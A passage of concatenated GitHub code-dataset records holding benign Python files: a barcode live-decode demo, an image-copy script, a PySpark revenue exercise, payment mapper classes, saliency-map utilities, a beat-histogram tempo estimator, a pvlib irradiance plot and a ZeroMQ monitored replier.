int(arg[2:])\n\n # Enable multicode? \n elif arg[0:2].upper() == \"-M\":\n useMultiCode = True\n \n # Suppress output?\n elif arg[0:2].upper() == \"-S\":\n suppressOutput = True\n \n # Enable tiles (and subsequently, multicode)?\n elif arg[0:2].upper() == \"-T\":\n useTiles = True\n\n # Set tiles X\n elif arg[0:2].upper() == \"-X\":\n tilesX = int(arg[2:])\n\n # Set tiles Y\n elif arg[0:2].upper() == \"-Y\":\n tilesY = int(arg[2:])\n\n # Set overlap\n elif arg[0:2].upper() == \"-O\":\n overlap = int(arg[2:])\n\n # Set maximum threads\n elif arg[0:2].upper() == \"-R\":\n maxThreads = int(arg[2:])\n\n # Write image with located barcodes?\n elif arg[0:2].upper() == \"-W\":\n writeImage = True\n \n# Last argument must be the image file name\n# fileName = sys.argv[argc-1]\n\ndef main():\n # Open live view of the camera\n cap = cv2.VideoCapture(0)\n if not cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n \n # Setup the SDK\n status = MWB.MWBregisterSDK(b'')\n if status != MWB.MWB_RTREG_OK:\n print(\"MWBregisterSDK returned \" + str(status) + \"; scan results will be masked and some features may not be available\")\n MWB.MWBsetActiveCodes( # MWB.MWB_CODE_MASK_QR |\n MWB.MWB_CODE_MASK_DM |\n # MWB.MWB_CODE_MASK_RSS |\n # MWB.MWB_CODE_MASK_39 |\n # MWB.MWB_CODE_MASK_EANUPC |\n # MWB.MWB_CODE_MASK_128 |\n # MWB.MWB_CODE_MASK_PDF |\n # MWB.MWB_CODE_MASK_AZTEC |\n # MWB.MWB_CODE_MASK_25 |\n # MWB.MWB_CODE_MASK_93 |\n # MWB.MWB_CODE_MASK_CODABAR |\n # MWB.MWB_CODE_MASK_DOTCODE |\n # MWB.MWB_CODE_MASK_11 |\n # MWB.MWB_CODE_MASK_MSI |\n # MWB.MWB_CODE_MASK_MAXICODE |\n # MWB.MWB_CODE_MASK_POSTAL |\n # MWB.MWB_CODE_MASK_TELEPEN |\n 0x0)\n MWB.MWBsetDirection(MWB.MWB_SCANDIRECTION_HORIZONTAL | MWB.MWB_SCANDIRECTION_VERTICAL)\n MWB.MWBsetLevel(effortLevel)\n if useMultiCode:\n MWB.MWBsetFlags(0, MWB.MWBgetFlags(0) | MWB.MWB_CFG_GLOBAL_ENABLE_MULTI)\n MWB.MWBsetResultType(MWB.MWB_RESULT_TYPE_MW)\n parserMask = MWP.MWP_PARSER_MASK_NONE\n parserMask = MWP.MWP_PARSER_MASK_AAMVA\n sdkVersion = 
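# --- Illustrative sketch (editor's addition) ---
# The manual sys.argv loop above iterates range(argc-2), i.e. it skips the last
# argument -- a leftover from when that argument was the (now commented-out)
# image filename. With camera input, argparse covers the same flags without the
# off-by-one; the defaults mirror the ones defined above:
import argparse

def parse_flags():
    parser = argparse.ArgumentParser(description='Live barcode decode demo')
    parser.add_argument('-E', type=int, default=4, dest='effort', help='effort level (1-5)')
    parser.add_argument('-M', action='store_true', dest='multicode', help='enable multi-code')
    parser.add_argument('-S', action='store_true', dest='suppress', help='suppress barcode results')
    parser.add_argument('-T', action='store_true', dest='tiles', help='generate tiled regions')
    parser.add_argument('-X', type=int, default=6, dest='tiles_x')
    parser.add_argument('-Y', type=int, default=6, dest='tiles_y')
    parser.add_argument('-O', type=int, default=6, dest='overlap', help='tile overlap in percent')
    parser.add_argument('-R', type=int, default=4, dest='max_threads')
    parser.add_argument('-W', action='store_true', dest='write_image')
    return parser.parse_args()
# --- end sketch ---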
MWB.MWBgetLibVersionText()\n print(\"Starting decoder - SDK Version \" + str(sdkVersion))\n print(\" Effort level: \" + str(effortLevel))\n if useMultiCode:\n print(\" Multi-code enabled\")\n if useTiles:\n print(\" Using tiles (\" + str(tilesX) + \" x \" + str(tilesY) + \") overlap \" + str(overlap) + \"%, \" + str(maxThreads) + \" threads\");\n\n resultLen = int(0)\n regionData = []\n regionCount = int(0)\n\n # Go through the main loop\n while True:\n ret, frame = cap.read()\n # frame = cv2.imread('download.jpeg')\n # Pass the frame to the cognex sdk\n '''\n 1. Convert cv2 image to PIL image\n 2. Continue with SDK\n '''\n img = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n frame = Image.fromarray(frame)\n grayScale = frame.convert('L')\n pixels = grayScale.tobytes()\n if useTiles:\n # Tiles/regions\n #\n # This feature is primarily intended for use with multicode when there exists relatively small codes within a large image, or when \n # the layout/locations of the barcodes is known. By dividing the image into smaller \"regions\", the decoder can process them much\n # more efficiently, including using multiple threads, if desired. After processing all the regions, the SDK merges the results, \n # eliminating duplicates (due to overlapping regions) and retursn the results as a single MWResults list.\n # \n # When using tiles, the SDK divides the image into equally sized regions based on the number of columns (tilesX) and rows (tilesY)\n # specified, with some overlap. Note that the overlap (expressed as a percentage of the image size) needs to be at least as large as\n # the largest barcode to be scanned--otherwise the possibility exists that a code could be split across adjacent tiles and then\n # not be detected.\n #\n # Regions are defined as two pairs of X,Y coordinates as the upper left and lower right corners, in percentages of the image size.\n #\n # An application can also construct its own region data, explicitly defining the coordinates of each region versus using the tiles\n # feature. 
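# --- Illustrative sketch (editor's addition) ---
# The comment block above describes how MWBcreateRegionsFromTiles splits the
# image into tilesX x tilesY regions with enough overlap that a barcode is not
# cut in half. The geometry itself in plain Python, with coordinates in percent
# of the image size as the comment describes (hypothetical helper, not the SDK
# call):
def tile_regions(tiles_x, tiles_y, overlap_pct):
    regions = []
    step_x, step_y = 100.0 / tiles_x, 100.0 / tiles_y
    for row in range(tiles_y):
        for col in range(tiles_x):
            left = max(0.0, col * step_x - overlap_pct)
            top = max(0.0, row * step_y - overlap_pct)
            right = min(100.0, (col + 1) * step_x + overlap_pct)
            bottom = min(100.0, (row + 1) * step_y + overlap_pct)
            regions.append((left, top, right, bottom))
    return regions
# --- end sketch ---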
This application only demonstrates using tiles.\n #\n \n # Create the region data\n regionCount, regionData = MWB.MWBcreateRegionsFromTiles(tilesX, tilesY, overlap)\n \n # Decode using the defined regions (multithreaded)\n resultLen, scanResults = MWB.MWBscanGrayscaleRegions(pixels, grayScale.width, grayScale.height, regionData, regionCount, maxThreads)\n \n else:\n # Decode using the entire image (and any defined scanning rectangle)\n resultLen, scanResults = MWB.MWBscanGrayscaleImage(pixels, grayScale.width, grayScale.height)\n\n # Make sure the results did not overrun our buffer (very bad)\n if resultLen > sizeof(scanResults):\n print(\"Critical error: scanResults buffer is too small\")\n exit()\n\n # The length returned is for the raw results buffer; we will create an MWResults object from this since\n # it's much easier to work with!\n #\n if resultLen > 0:\n # Display MWResults\n results = MWR.MWResults(scanResults)\n if results.count > 0:\n print(\"Total barcodes detected: \", results.count)\n\n if not(suppressOutput):\n for i in range(results.count):\n result = results.results[i]\n print(str(i+1) + \": (\" + result.typeName+ \") \" + str(result.text))\n if parserMask != MWP.MWP_PARSER_MASK_NONE:\n \n parsedData = create_string_buffer(10000)\n \n # Envoke the parser\n #\n # The SDK provides two parsers, each returning different results:\n # JSON - parsed results are returned as a JSON document\n # Text - parsed results are returned as key/value pairs (primarily for demonstration/readability purposes)\n #\n #pLen, parsedData = MWB.MWPgetJSON(parserMask, result.parserInput, len(result.parserInput))\n pLen, parsedData = MWB.MWPgetFormattedText(parserMask, result.parserInput, len(result.parserInput))\n if pLen > sizeof(parsedData):\n print(\"Critical error: parsedData buffer is too small\")\n exit()\n \n if pLen > 0:\n print(\" Parsed Result: \" + parsedData.raw[0:int(pLen)].decode(\"utf-8\"))\n\n \n # Reload the orignal image\n im = frame\n draw = ImageDraw.Draw(im)\n \n # Draw a red box around each barcode found\n for i in range(results.count):\n result = results.results[i]\n draw.line([(result.locationPoints.p1.x,result.locationPoints.p1.y),\n (result.locationPoints.p2.x,result.locationPoints.p2.y),\n (result.locationPoints.p3.x,result.locationPoints.p3.y),\n (result.locationPoints.p4.x,result.locationPoints.p4.y),\n (result.locationPoints.p1.x,result.locationPoints.p1.y)],fill=(255,0,0),width=4)\n \n img = np.array(im)\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n cv2.imshow('image', img)\n\n if cv2.waitKey(1) == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n exit()\n \n \n\n else:\n print(\"No barcodes found: decoder returned \" + str(resultLen))\n ret, frame = cap.read()\n cv2.imshow('image', frame)\n\n if cv2.waitKey(1) == ord('q'):\n cap.release()\n cv2.destroyAllWindows()\n exit()\n\n\n\n # Display the live view\n \n\n\nif __name__ == '__main__':\n main()","repo_name":"Duncan-Alex-Clark/projectAudit","sub_path":"demo/pythonDemo/liveDecode.py","file_name":"liveDecode.py","file_ext":"py","file_size_in_byte":10387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32125832631","text":"import os\nimport shutil\n\n# Source folder containing the PNG pictures\nsource_folder = './raw'\n\n# Destination folder for unique pictures\ndestination_folder = './similar'\n\n# Folder to check for duplicates\ncheck_folder = './different'\n\n# Get the list of files in the source folder\nsource_files = os.listdir(source_folder)\n\n# 
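# --- Illustrative sketch (editor's addition) ---
# The live-decode loop above round-trips frames between OpenCV (BGR numpy
# arrays) and PIL (RGB images) so the SDK gets grayscale bytes and the overlay
# can be drawn with ImageDraw. Worth noting: the loop computes an RGB copy
# (`img`) but then builds the PIL image from the raw BGR frame, so the channel
# swap is effectively skipped. The conversion pair in isolation:
import numpy as np
import cv2
from PIL import Image

def bgr_to_pil(frame):
    return Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))

def pil_to_bgr(image):
    return cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)
# --- end sketch ---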
Create the destination folder if it doesn't exist\nif not os.path.exists(destination_folder):\n os.makedirs(destination_folder)\n\n# List the check folder once instead of calling os.listdir() on every iteration\ncheck_files = set(os.listdir(check_folder))\n\n# Iterate over each file in the source folder\nfor file_name in source_files:\n if file_name.endswith('.png'):\n # Check if the file exists in the check folder\n if file_name in check_files:\n print(f\"Duplicate file found: {file_name}\")\n else:\n # Copy the file to the destination folder\n source_file_path = os.path.join(source_folder, file_name)\n destination_file_path = os.path.join(destination_folder, file_name)\n shutil.copy2(source_file_path, destination_file_path)\n print(f\"Unique file copied: {file_name}\")\n","repo_name":"chess-playing-robotic-arm/RobotArmSoftware","sub_path":"copyImages.py","file_name":"copyImages.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5237999586","text":"#\n# What is the average revenue of the orders?\n# =========================================\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import *\nfrom pyspark.sql import Row\nfrom pyspark.sql.types import IntegerType\n\n# Create the Spark session\nspark = SparkSession.builder \\\n .master(\"local\") \\\n .config(\"spark.sql.autoBroadcastJoinThreshold\", -1) \\\n .config(\"spark.executor.memory\", \"500mb\") \\\n .appName(\"Exercise1\") \\\n .getOrCreate()\n\n# Read the source tables\nproducts_table = spark.read.parquet(\"./data/products_parquet\")\nsales_table = spark.read.parquet(\"./data/sales_parquet\")\nsellers_table = spark.read.parquet(\"./data/sellers_parquet\")\n\n# Do the join and show the result (show() prints the table itself, so no extra print() is needed)\nsales_table.join(products_table, sales_table[\"product_id\"] == products_table[\"product_id\"], \"inner\") \\\n\t\t\t\t .agg(avg(products_table[\"price\"] * sales_table[\"num_pieces_sold\"])) \\\n\t\t\t\t .show()","repo_name":"nbuzzano/spark-exercises","sub_path":"exercise01-A.py","file_name":"exercise01-A.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28026724458","text":"import related\nfrom ..commons.paging import ResponsePage\nfrom ..commons import fields\n\n\n@related.immutable\nclass Paid:\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n@related.immutable\nclass Pending:\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n\n@related.immutable\nclass Rejected:\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n@related.immutable\nclass Payment:\n paymentId = related.StringField()\n paymentDate = related.DateField(formatter='%Y-%m-%d')\n bankCode = related.IntegerField()\n bankbranchCode = related.IntegerField()\n accountNumber = related.IntegerField()\n brandCode = related.IntegerField()\n companyNumber = related.StringField()\n documentNumber = related.StringField()\n companyName = related.StringField()\n tradeName = related.StringField()\n netAmount = related.IntegerField()\n status = related.StringField()\n statusCode = related.IntegerField()\n type = related.StringField()\n typeCode = related.StringField()\n\n\n@related.immutable\nclass PaymentDaily:\n date = related.DateField(formatter='%Y-%m-%d')\n count = related.IntegerField()\n netAmount = fields.DecimalField()\n\n paid = related.ChildField(Paid, required=False)\n pending = related.ChildField(Pending, required=False)\n rejected = related.ChildField(Rejected, required=False)\n payments 
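# --- Illustrative sketch (editor's addition) ---
# The same average-revenue question as the Spark exercise above, expressed
# through a temp view and Spark SQL, with an alias so the output column gets a
# readable header (this assumes the `spark`, `sales_table` and `products_table`
# objects created above):
sales_table.createOrReplaceTempView("sales")
products_table.createOrReplaceTempView("products")
spark.sql("""
    SELECT AVG(p.price * s.num_pieces_sold) AS avg_revenue
    FROM sales s
    JOIN products p ON s.product_id = p.product_id
""").show()
# --- end sketch ---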
= related.SequenceField(Payment, required=False)\n\n\n@related.immutable\nclass PaymentsDaily:\n paymentsDaily = related.SequenceField(PaymentDaily)\n\n\n@related.immutable\nclass Response(ResponsePage):\n content = related.ChildField(PaymentsDaily)","repo_name":"marcioinfo/ApiClient","sub_path":"rede-client/src/userede/mappers/payments/response.py","file_name":"response.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18669166894","text":"import os\nimport time\nimport rpy2.robjects as robjects\nfrom rpy2.robjects import numpy2ri\nfrom rpy2.robjects.packages import importr\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\nimport keras\nimport innvestigate\nimport xarray as xr\nimport pandas as pd\nimport datetime as dt\nimport glob\nfrom tqdm import tqdm\n\n# PATHS\nXAI_PATH = './data/'\n\n# Get the proper neuron index based on the predictand map\ndef getNeuronIdx(neuron):\n\n neuron = int(neuron)\n \n if neuron == 2000:\n return 23920\n elif neuron == 5950:\n return 2657\n else:\n print('Please provide a valid neuron index')\n return None\n\n# Normalize the saliency maps\ndef normalizeSM(saliencyMaps):\n\n for idx in range(saliencyMaps.shape[0]):\n\n minSM = np.min(saliencyMaps[idx, :, :, :])\n maxSM = np.max(saliencyMaps[idx, :, :, :])\n saliencyMaps[idx, :, :, :] = (saliencyMaps[idx, :, :, :] - minSM) / (maxSM - minSM)\n\n return saliencyMaps\n\n# Compute and save the saliency maps\ndef compositeTrainSet(modelObj, modelName, neuronIdx, xData):\n\n # Get neuron index for CNNDoury\n if 'UNET' in modelName:\n neuron = getNeuronIdx(neuronIdx)\n else:\n neuron = neuronIdx\n\n # Set batch size for computing the SMs\n # Can't increase batchSize above 1 due to an existing bug in iNNvestigate\n # https://github.com/albermax/innvestigate/issues/246\n batchSize = 1\n\n # Pre-allocate memory for the saliencyMaps array\n saliencyMaps = np.empty(xData.shape)\n\n # Create analyzer\n analyzer = innvestigate.create_analyzer(name = 'integrated_gradients',\n model = modelObj,\n neuron_selection_mode = 'index')\n\n # First batch\n saliencyMaps[:batchSize, :] = analyzer.analyze(xData[:batchSize, :, :, :], neuron)\n saliencyMaps[:batchSize, :] = np.absolute(saliencyMaps[:batchSize, :])\n saliencyMaps[:batchSize, :] = normalizeSM(saliencyMaps[:batchSize, :])\n\n # Iterate over batches\n for i in tqdm(range(batchSize, xData.shape[0], batchSize)):\n \n saliencyMaps[i:i+batchSize, :] = analyzer.analyze(xData[i:i+batchSize, :, :, :], neuron)\n saliencyMaps[i:i+batchSize, :] = np.absolute(saliencyMaps[i:i+batchSize, :])\n saliencyMaps[i:i+batchSize, :] = normalizeSM(saliencyMaps[i:i+batchSize, :])\n\n # Save saliencyMaps as npy\n np.save(file = XAI_PATH + 'SMtrainSet_' + modelName + '_neuron' + str(neuronIdx) + '.npy',\n arr = saliencyMaps)","repo_name":"jgonzalezab/XAI-Statistical-Downscaling","sub_path":"XAI/lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43038331326","text":"import numpy\nimport pylab\nimport scipy.fftpack\n\nimport overlap\n\ndef autocorrelation(signal):\n \"\"\" this matches Marsyas exactly. 
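# --- Illustrative sketch (editor's addition) ---
# normalizeSM() in the XAI utils above min-max scales each saliency map with a
# Python loop over the batch. The same per-sample scaling, vectorized over the
# batch axis; the eps guard for flat maps is an editor's addition, not the
# project's code:
import numpy as np

def normalize_saliency(maps, eps=1e-12):
    # maps has shape (batch, H, W, C), as in compositeTrainSet() above
    per_map_min = maps.min(axis=(1, 2, 3), keepdims=True)
    per_map_max = maps.max(axis=(1, 2, 3), keepdims=True)
    return (maps - per_map_min) / (per_map_max - per_map_min + eps)
# --- end sketch ---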
\"\"\"\n N = signal.shape[1]\n ffts = scipy.fftpack.fft(signal, 2*N, axis=1) / (2*N)\n ffts_abs = abs(ffts)\n ffts_abs_scaled = ffts_abs**0.5\n scratch = (scipy.fftpack.ifft(ffts_abs_scaled, axis=1\n ).real)*(2*N)\n xcorr = scratch[:,:N]\n return xcorr\n\n\ndef find_peaks(signal, number=10, peak_neighbors=1):\n candidates = []\n for i in xrange(peak_neighbors, len(signal)-peak_neighbors):\n if signal[i-1] < signal[i] > signal[i+1]:\n ok = True\n for j in xrange(i-peak_neighbors, i):\n if signal[j] >= signal[i]:\n ok = False\n for j in xrange(i+1, i+peak_neighbors):\n if signal[j] >= signal[i]:\n ok = False\n if ok:\n candidates.append( (signal[i], i) )\n candidates.sort(reverse=True)\n\n peaks = []\n #pylab.figure()\n #pylab.plot(signal)\n for c in candidates[:number]:\n index = c[1]\n mag = c[0]\n peaks.append(index)\n #print c\n #pylab.plot(index, mag, 'o')\n #pylab.show()\n\n return numpy.array(peaks)\n\ndef autocorr_index_to_bpm(index, oss_sr):\n return 60.0*oss_sr / index\ndef bpm_to_autocorr_index(bpm, oss_sr):\n return 60.0*oss_sr / bpm\n\n\ndef beat_histogram(defs, oss_sr, oss_data, plot=False):\n ### overlap\n overlapped = overlap.sliding_window(\n numpy.append(\n numpy.zeros(defs.BH_WINDOWSIZE - defs.BH_HOPSIZE),\n oss_data),\n #oss_data,\n defs.BH_WINDOWSIZE, defs.BH_HOPSIZE)\n #beat_histogram_sr = oss_sr / defs.BH_HOPSIZE\n\n ### autocorrelation\n autocorr = autocorrelation(overlapped)\n if defs.OPTIONS_BH < 2:\n sum_autocorr = numpy.sum(autocorr, axis=0)\n\n # remember that autocorrelation indices are reversed\n low = int(bpm_to_autocorr_index(defs.BPM_MAX, oss_sr))\n high = int(bpm_to_autocorr_index(defs.BPM_MIN, oss_sr))\n\n bpms = autocorr_index_to_bpm( numpy.arange(low, high), oss_sr )\n boxed_autocorr = sum_autocorr[low:high]\n use_autocorr = boxed_autocorr\n\n if defs.OPTIONS_BH == 1:\n # highpass\n b, a = scipy.signal.butter(2, 0.01, btype='high')\n filt_autocorr = scipy.signal.filtfilt(b, a, boxed_autocorr)\n # lowpass\n #b, a = scipy.signal.butter(2, 0.1)\n #filt_autocorr = scipy.signal.filtfilt(b, a, boxed_autocorr)\n use_autocorr = filt_autocorr\n\n these_peaks = find_peaks(use_autocorr,\n number=8, peak_neighbors=1)\n these_peaks = numpy.array(these_peaks)\n these_peaks_bpm = autocorr_index_to_bpm(these_peaks+low, oss_sr)\n\n #best_index = numpy.argmax(boxed_autocorr)\n #best_bpm = bpms[best_index]\n \n if plot:\n pylab.plot(bpms, boxed_autocorr)\n if defs.OPTIONS_BH == 1:\n pylab.plot(bpms, filt_autocorr)\n for index, bpm in zip(these_peaks, these_peaks_bpm):\n pylab.plot(bpm, use_autocorr[index], 'o')\n pylab.show()\n #exit(1)\n return these_peaks_bpm\n #exit(1)\n\n ### beat histogram\n Hn = numpy.zeros( (autocorr.shape[0], 4*defs.BPM_MAX) )\n for i in xrange( autocorr.shape[0] ):\n if i > 0 and i != (defs.BH_WINDOWSIZE / defs.BH_HOPSIZE):\n Hn[i] = Hn[i-1]\n prev_Hni = 4*defs.BPM_MAX-1\n pprev_Hni = prev_Hni\n sumamp = 0.0\n count = 1\n\n for j in xrange(1, autocorr.shape[1]):\n factor = 8/2\n Hni = int((oss_sr * 60.0 * factor / (j+1)) + 0.5);\n #bpm = autocorr_bpms[i]\n if Hni < 4*defs.BPM_MAX and Hni > 40:\n amp = autocorr[i][j]\n if amp < 0:\n amp = 0\n if prev_Hni == Hni:\n sumamp += amp\n count += 1\n else:\n sumamp += amp\n Hn[i][prev_Hni] += sumamp / float(count)\n sumamp = 0.0\n count = 1\n ### linear interpolate not-set bins\n if pprev_Hni - prev_Hni > 1:\n x0 = prev_Hni\n x1 = pprev_Hni\n y0 = Hn[i][prev_Hni]\n y1 = Hn[i][pprev_Hni]\n for k in xrange(prev_Hni+1, pprev_Hni):\n Hn[i][k] = y0 + (y1-y0)*(k-x0)/(x1-x0)\n #print x0, x1, y0, y1, 
Hn[i][pprev_Hni-1]\n pprev_Hni = prev_Hni\n prev_Hni = Hni\n #numpy.savetxt('bh.txt', Hn[0])\n\n #for a in range(0, 20):\n # numpy.savetxt(\"bh-combo-%i.txt\" % a, Hn[a])\n\n #if plot:\n # pylab.figure()\n # Hn_bpms = numpy.arange( 4*defs.BPM_MAX) / 4.0\n # pylab.plot(Hn_bpms, summed_beat_histograms)\n # pylab.title(\"Beat histogram\")\n\n ### time stretch, add\n harmonic_strengthened_bh = numpy.zeros( Hn.shape )\n for i in xrange( Hn.shape[0] ):\n ### unchecked direct translation of marsyas\n stretched = numpy.zeros( Hn.shape[1] )\n factor = 0.5\n numSamples = Hn.shape[1]\n for t in xrange( Hn.shape[1] ):\n ni = t*factor\n li = int(ni) % numSamples\n ri = li + 1\n w = ni - li\n if ri < numSamples:\n stretched[t] = Hn[i][li] + w * (Hn[i][ri] - Hn[i][li])\n else:\n stretched[t] = Hn[t]\n harmonic_strengthened_bh[i] = (\n Hn[i]\n #+ stretched\n )\n\n #numpy.savetxt(\"foo-%i.txt\" % i, harmonic_strengthened_bh[i])\n\n #for a in range(0, 20):\n # numpy.savetxt(\"bh-combo-%i.txt\" % a, harmonic_strengthened_bh[a])\n\n #if plot:\n # Hn_bpms = numpy.arange( 4*defs.BPM_MAX) / 4.0\n # pylab.plot(Hn_bpms, harmonic_strengthened_bh)\n\n ### pick top 8 candidates\n #peaks = []\n #for i in xrange( Hn.shape[0] ):\n # these_peaks = find_peaks(harmonic_strengthened_bh[i],\n # number=8, width=11)\n # peaks.append(these_peaks)\n\n #summed = numpy.sum(harmonic_strengthened_bh, axis=0)\n #summed = numpy.sum(Hn, axis=0)\n\n sHn = numpy.sum(Hn, axis=0)\n if plot:\n pylab.figure()\n sHn = numpy.sum(Hn, axis=0)\n pylab.plot(numpy.arange(len(sHn))/4.0, sHn)\n\n\n# folded_hist = numpy.zeros(60*4)\n# for i in xrange(1, len(summed)-1):\n# bpm = i/4.0\n# j = i\n# while bpm < 15:\n# bpm *= 2\n# j *= 2\n# while bpm > 30:\n# bpm /= 2.0\n# j /= 2.0\n# #j = int(round(j))\n# j = int(j)\n# #print \"%i\\tto\\t%i\" % (i, j)\n# if j >= len(folded_hist):\n# continue\n# folded_hist [j] += summed[i]\n#\n\n\n ### zzz confirmed up to here\n peaks = []\n for i in xrange( Hn.shape[0] ):\n these_peaks = find_peaks(harmonic_strengthened_bh[i],\n number=8, peak_neighbors=11)\n peaks.append(these_peaks / 4.0)\n #bpms = numpy.array(these_peaks)/4.0\n # numpy.savetxt(\"bh-peaks-%i.txt\" % i, bpms)\n\n cand_peaks = find_peaks(sHn,\n number=8, peak_neighbors=11) / 4.0\n #pylab.plot(numpy.arange(len(sHn))/4.0, sHn)\n pylab.show()\n #pylab.plot(cand_peaks)\n return cand_peaks\n\n #candidate_bpms = [ Hn_bpms[i] for i in peaks ]\n #print candidate_bpms\n #for p in peaks:\n # print numpy.array(p)/4\n #if plot:\n # pylab.figure()\n # pylab.plot(numpy.arange(30*4, 60*4)/4.0, folded_hist[30*4:])\n # pylab.show()\n return peaks[0], peaks\n\n","repo_name":"abramhindle/marsyas-fork","sub_path":"scripts/large-evaluators/tempo-reference-implementation/beat_histogram.py","file_name":"beat_histogram.py","file_ext":"py","file_size_in_byte":7672,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4626406388","text":"#!/usr/bin/env python3\nfrom pvlib import location\nfrom pvlib import irradiance\nimport pandas as pd\nfrom matplotlib import pyplot as plt\n\n# For this example, we will be using Golden, Colorado\ntz = 'Hongkong'\nlat, lon = 22.4006261, 113.9700839\n\n# Create location object to store lat, lon, timezone\nsite = location.Location(lat, lon, tz=tz)\n\n\n# Calculate clear-sky GHI and transpose to plane of array\n# Define a function so that we can re-use the sequence of operations with\n# different locations\ndef get_irradiance(site_location, date, tilt, surface_azimuth):\n # Creates one day's 
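# --- Illustrative sketch (editor's addition) ---
# The index<->BPM helpers above invert each other: autocorrelation lag k (in
# OSS frames) maps to 60*oss_sr/k BPM and back. A quick sanity check under an
# assumed onset-strength sample rate:
oss_sr = 86.0              # assumed OSS rate in Hz (not from the source)
lag = 43                   # autocorrelation lag in frames
bpm = 60.0 * oss_sr / lag  # -> 120.0 BPM
assert round(60.0 * oss_sr / bpm) == lag
# --- end sketch ---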
worth of 10 min intervals\n times = pd.date_range(date, freq='10min', periods=6*24,\n tz=site_location.tz)\n # Generate clearsky data using the Ineichen model, which is the default\n # The get_clearsky method returns a dataframe with values for GHI, DNI,\n # and DHI\n clearsky = site_location.get_clearsky(times)\n # Get solar azimuth and zenith to pass to the transposition function\n solar_position = site_location.get_solarposition(times=times)\n # Use the get_total_irradiance function to transpose the GHI to POA\n POA_irradiance = irradiance.get_total_irradiance(\n surface_tilt=tilt,\n surface_azimuth=surface_azimuth,\n dni=clearsky['dni'],\n ghi=clearsky['ghi'],\n dhi=clearsky['dhi'],\n solar_zenith=solar_position['apparent_zenith'],\n solar_azimuth=solar_position['azimuth'])\n # Return DataFrame with only GHI and POA\n return pd.DataFrame({'GHI': clearsky['ghi'],\n 'POA': POA_irradiance['poa_global']})\n\n\n# Get irradiance data for summer and winter solstice, assuming 25 degree tilt\n# and a south facing array\nsummer_irradiance = get_irradiance(site, '06-21-2020', 10, 173)\nwinter_irradiance = get_irradiance(site, '06-21-2020', 15, 173)\n\n# Convert Dataframe Indexes to Hour:Minute format to make plotting easier\nsummer_irradiance.index = summer_irradiance.index.strftime(\"%H:%M\")\nwinter_irradiance.index = winter_irradiance.index.strftime(\"%H:%M\")\n\n# Plot GHI vs. POA for winter and summer\nfig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\nsummer_irradiance['GHI'].plot(ax=ax1, label='GHI')\nsummer_irradiance['POA'].plot(ax=ax1, label='POA')\nwinter_irradiance['GHI'].plot(ax=ax2, label='GHI')\nwinter_irradiance['POA'].plot(ax=ax2, label='POA')\nax1.set_xlabel('Time of day (Summer)')\nax2.set_xlabel('Time of day (Winter)')\nax1.set_ylabel('Irradiance ($W/m^2$)')\nax1.legend()\nax2.legend()\nplt.show()\nplt.savefig('foo.pdf')\n","repo_name":"kennethkwokop/solar-simulation","sub_path":"poa.py","file_name":"poa.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74553450471","text":"import zmq\nfrom zmq.utils.monitor import parse_monitor_message\n\nfrom events import EVENTS_MAP\n\n\ndef main() -> None:\n print(\"Start replier\")\n ctx = zmq.Context()\n sock = ctx.socket(zmq.REP)\n\n monitor = sock.get_monitor_socket()\n\n poller = zmq.Poller()\n poller.register(sock, zmq.POLLIN)\n poller.register(monitor, zmq.POLLIN)\n\n sock.bind(\"ipc://gandalf\")\n\n try:\n # event loop\n while True:\n # wait for either message or event\n polled = dict(poller.poll())\n\n # handle events\n if monitor in polled:\n try:\n while True:\n event_raw = monitor.recv_multipart(zmq.DONTWAIT)\n print(\"EVENT_RAW\", event_raw, flush=True)\n\n event = parse_monitor_message(event_raw)\n event_name = EVENTS_MAP[event['event']]\n print(\"EVENT\", event_name, event, flush=True)\n except zmq.ZMQError:\n print(\"NO EVENTS\", flush=True)\n\n # handle message\n if sock in polled:\n msg = sock.recv_string()\n print(\"SOCK_RECV\", msg, flush=True)\n print(\"REPL\")\n sock.send_string(f\"GOT {msg}\")\n\n print(\"----\\n\")\n\n except KeyboardInterrupt:\n print(\"\\nStop detected\")\n finally:\n print(\"Cleaning ...\")\n sock.disable_monitor()\n monitor.close(linger=0)\n sock.close(linger=0)\n\n print(\"Terminating context ...\")\n ctx.term()\n\n print(\"DONE\")\n\n\nif __name__ == '__main__':\n 
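# --- Illustrative sketch (editor's addition) ---
# A minimal REQ client for the monitored ZeroMQ replier above: connect to the
# same ipc endpoint, send a string, read the "GOT ..." echo. Run it in a second
# process while the replier is up.
import zmq

def ping(text="hello"):
    ctx = zmq.Context()
    sock = ctx.socket(zmq.REQ)
    sock.connect("ipc://gandalf")
    sock.send_string(text)
    reply = sock.recv_string()   # the replier answers "GOT <text>"
    sock.close(linger=0)
    ctx.term()
    return reply
# --- end sketch ---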
